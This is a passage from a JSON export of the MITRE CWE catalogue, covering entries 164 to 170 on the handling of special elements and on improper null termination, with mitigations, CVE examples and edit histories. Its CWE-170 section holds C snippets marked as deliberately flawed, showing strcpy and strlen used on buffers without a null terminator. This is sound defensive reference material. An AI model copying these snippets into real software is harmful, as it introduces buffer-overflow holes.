missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Internal Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Internal Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Internal Special Element","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Internal Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"165":{"attr":{"@_ID":"165","@_Name":"Improper Neutralization of Multiple Internal Special Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.","Extended_Description":"As data is parsed, improperly handled multiple internal special elements may cause the process to take unexpected actions that result in an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that multiple internal special elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Internal Special Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Multiple Internal Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Multiple Internal Special Elements","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Multiple Internal Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"166":{"attr":{"@_ID":"166","@_Name":"Improper Handling of Missing Special Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that special elements will be removed in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1362","Description":"Crash via message type without separator character","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1362"},{"Reference":"CVE-2002-0729","Description":"Missing special character (separator) causes crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0729"},{"Reference":"CVE-2002-1532","Description":"HTTP GET without \\\\r\\\\n\\\\r\\\\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Special Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Missing Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Special Element","attr":{"@_Date":"2009-05-27"}}]}},"167":{"attr":{"@_ID":"167","@_Name":"Improper Handling of Additional Special Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that extra special elements will be injected in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0116","Description":"Extra \\"<\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116"},{"Reference":"CVE-2001-1157","Description":"Extra \\"<\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"},{"Reference":"CVE-2002-2086","Description":"\\"<script\\" - probably a cleansing error","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Special Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Extra Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Additional Special Element","attr":{"@_Date":"2009-05-27"}}]}},"168":{"attr":{"@_ID":"168","@_Name":"Improper Handling of Inconsistent Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle input in which an inconsistency exists between two or more special characters or reserved words.","Extended_Description":"An example of this problem would be if paired characters appear in the wrong order, or if the special characters are not properly nested.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control","Non-Repudiation"],"Impact":["DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Hide Activities"]}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that inconsistent special elements will be injected/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Inconsistent Special Elements"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Inconsistent Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Inconsistent Special Elements","attr":{"@_Date":"2010-12-13"}}]}},"170":{"attr":{"@_ID":"170","@_Name":"Improper Null Termination","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.","Extended_Description":"Null termination errors frequently occur in two different ways. An off-by-one error could cause a null to be written out of bounds, leading to an overflow. Or, a program could use a strncpy() function call incorrectly, which prevents a null terminator from being added at all. Other scenarios are possible.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"126","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"147","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"464","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"463","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Memory","Execute Unauthorized Code or Commands"],"Note":"The case of an omitted null character is the most dangerous of the possible issues. This will almost certainly result in information disclosure, and possibly a buffer overflow condition, which may be exploited to execute arbitrary code."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Read Memory","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"If a null character is omitted from a string, then most string-copying functions will read data until they locate a null character, even outside of the intended boundaries of the string. This could: cause a crash due to a segmentation fault cause sensitive adjacent memory to be copied and sent to an outsider trigger a buffer overflow when the copy is being written to a fixed-size buffer."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Misplaced null characters may result in any number of security problems. The biggest issue is a subset of buffer overflow, and write-what-where conditions, where data corruption occurs from the writing of a null character over valid data, or even instructions. A randomly placed null character may put the system into an undefined state, and therefore make it prone to crashing. A misplaced null character may corrupt other data in memory."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands"],"Note":"Should the null character corrupt the process flow, or affect a flag controlling access, it may lead to logical errors which allow for the execution of arbitrary code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Use a language that is not susceptible to these issues. However, be careful of null byte interaction errors (CWE-626) with lower-level constructs that may be written in a language that is susceptible."},{"Phase":"Implementation","Description":"Ensure that all string functions used are understood fully as to how they append null characters. Also, be wary of off-by-one errors when appending nulls to the end of strings."},{"Phase":"Implementation","Description":"If performance constraints permit, special code can be added that validates null-termination of string buffers, this is a rather naive and error-prone solution."},{"Phase":"Implementation","Description":"Switch to bounded string manipulation functions. Inspect buffer lengths involved in the buffer overrun trace reported with the defect."},{"Phase":"Implementation","Description":"Add code that fills buffers with nulls (however, the length of buffers still needs to be inspected, to ensure that the non null-terminated string is not written at the physical end of the buffer)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a NULL terminator.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define MAXLEN 1024...char *pathbuf[MAXLEN];...read(cfgfile,inputbuf,MAXLEN); //does not null terminatestrcpy(pathbuf,inputbuf); //requires null terminated input...","xhtml:br":["","","","","",""]}},"Body_Text":"The code above will behave correctly if the data read from cfgfile is null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected NULL character, the call to strcpy() will continue copying from memory until it encounters an arbitrary NULL character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack."},{"Intro_Text":"In the following code, readlink() expands the name of a symbolic link stored in pathname and puts the absolute path into buf. The length of the resulting value is then calculated using strlen().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[MAXPATH];...readlink(pathname, buf, MAXPATH);int length = strlen(buf);...","xhtml:br":["","","",""]}},"Body_Text":"The code above will not always behave correctly as readlink() does not append a NULL byte to buf. Readlink() will stop copying characters once the maximum size of buf has been reached to avoid overflowing the buffer, this will leave the value buf not NULL terminated. In this situation, strlen() will continue traversing memory until it encounters an 